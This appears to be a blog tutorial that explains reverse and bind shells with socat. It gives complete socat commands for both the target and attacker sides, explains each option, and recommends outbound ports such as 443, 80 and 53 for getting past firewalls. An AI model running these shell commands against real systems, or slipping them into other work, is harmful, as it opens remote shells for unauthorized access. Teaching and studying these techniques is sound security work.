Reverse Shell vs Bind Shell ft. Socat
Sundaram G
Analogy
Imagine two spies trying to communicate. One spy (attacker) waits at a safe house (port). The other spy (target) reaches out to initiate a secret chat - that’s a reverse shell. But if the safe house is locked and inaccessible, the first spy might knock on the other spy’s door instead - that’s a bind shell.
Now let’s understand how this works using Socat, the Swiss Army knife of networking tools.
What is Socat?
Socat (SOcket CAT) is a powerful command-line utility used to establish bidirectional data transfers between two data channels. Think of it as Netcat's smarter cousin. It can create encrypted connections, handle TTYs better, and forward between many protocols (TCP, UDP, UNIX sockets, etc.).
Netcat vs Socat
| Tool | Netcat | Socat |
| Purpose | Simple TCP/UDP data transfer | Advanced data relay between endpoints |
| Protocol Support | TCP, UDP | TCP, UDP, SSL, UNIX sockets, more |
| Encryption | Not supported | SSL/TLS supported |
| Flexibility | Basic one-liners | Highly customizable setups |
| Ease of Use | Beginner-friendly | Steeper learning curve |
| Best For | Quick tests, basic reverse shells | Tunneling, relays, secure connections |
Reverse Shell with Socat
Target Command (sends shell to attacker):
socat EXEC:"bash -li",pty,stderr,setsid,sigint,sane TCP:<attacker-ip>:<port>
What this does:
EXEC:"bash -li": Launches an interactive login bash shell.pty: Allocates a pseudo-terminal, making the shell behave properly.stderr,setsid,sigint,sane: Ensures proper signal handling and clean I/O.TCP:<attacker-ip>:<port>: Connects to the attacker’s IP and port.
Attacker Command (listen and forward to terminal):
socat TCP-L:<port> STDIO
Or better, for a real terminal interface:
socat TCP-L:<port> FILE:`tty`,raw,echo=0
Let’s breakdown the above command:
TCP-L:4444
This says: “Listen on TCP port 4444 (for example)”
When someone connects, receive data from them
This is your input stream
FILE:/dev/pts/X,raw,echo=0 (i.e., FILE:`tty` )
This is a file that represents your terminal (your screen + keyboard)
This is your output stream
Anything received over TCP will be written into this file (i.e., your terminal)
Anything you type goes into this file, and
socatsends that to the TCP connection
This is the redirection:
Data from the TCP socket ←→ your terminal
socatcopies data in both directions
Full I/O Redirection Explained - Flow:
TCP-L:4444 ← input from reverse shell
FILE:`
tty` → sends that input into your terminal screenYour keystrokes (in that terminal) go into
/dev/pts/Xand get sent back to the reverse shell via the TCP socket
Bind Shell with Socat
Target Command (starts a listener with shell):
socat TCP-L:<port>,reuseaddr,fork EXEC:"bash -li",pty,stderr,setsid,sigint,sane
TCP-L:<port>: Starts a listener on the target's machine.reuseaddr,fork: Allows reuse of the port and handles multiple connections.EXEC:"bash -li": Same — starts a bash shell.pty,setsid: Ensures TTY allocation and session control.
Attacker Command (connects to target):
socat STDIO TCP:<target-ip>:<port>
Choosing the Right Port
Reverse Shell: Choose commonly allowed outbound ports like
443,80, or53because most firewalls allow outgoing traffic on these.Bind Shell: Choose ports less likely to be firewalled on the inbound side, but this is trickier. If a firewall blocks incoming traffic to unknown ports, bind shells won’t work well.
Reverse shells are more firewall-friendly in real-world scenarios.
TL;DR
| Feature | Reverse Shell (Socat) | Bind Shell (Socat) |
| Initiated by | Target | Attacker |
| Firewall Bypass | Easier (uses outbound connection) | Harder (needs open inbound port on target) |
| Stability | Very stable with TTY, signals, etc. | Stable with fork, pty, setsid options |
Serious Note: Why did the hacker break up with Netcat?
Because Socat had better communication skills and actually listened on both ends. 😎
Subscribe to my newsletter
Read articles from Sundaram G directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by